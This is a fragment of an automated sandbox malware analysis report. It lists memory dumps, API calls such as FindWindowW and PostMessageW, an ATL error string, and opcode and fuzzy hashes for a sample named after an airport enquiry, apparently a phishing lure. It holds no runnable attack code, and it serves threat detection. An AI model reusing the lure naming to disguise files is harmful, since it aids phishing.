            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
            • API String ID: 3158253471-631824599
            • Opcode ID: 4c4b97718580f9d8946c7e7046699476863433354c77bca2b2d7c15083741f7c
            • Instruction ID: 34b75b05e1d4907416a45ef051d35df14a1ef13c43ae6c380e07193e34056b11
            • Opcode Fuzzy Hash: 4c4b97718580f9d8946c7e7046699476863433354c77bca2b2d7c15083741f7c
            • Instruction Fuzzy Hash: 7DE039B02003118FD730DF28E5083827AE0AB01758F14892CF456C2760D7B4E848CB72
            Function 00D05BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
            Download Yara Rule
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D05BF5
            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D05C08
              • Part of subcall function 00CE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: bb0df3198786cded7a8e01c212989c5bcc9c3597097f0839115d73e7acd155c0
            • Instruction ID: 6460ef697ff2d093fdd8e95886caa072820ec9c4995cddda620c62afa6565db2
            • Opcode Fuzzy Hash: bb0df3198786cded7a8e01c212989c5bcc9c3597097f0839115d73e7acd155c0
            • Instruction Fuzzy Hash: 53D01231388311BBE778BB70EC0FFD76A14AB10B51F100839B749EA2D0D9E45800C660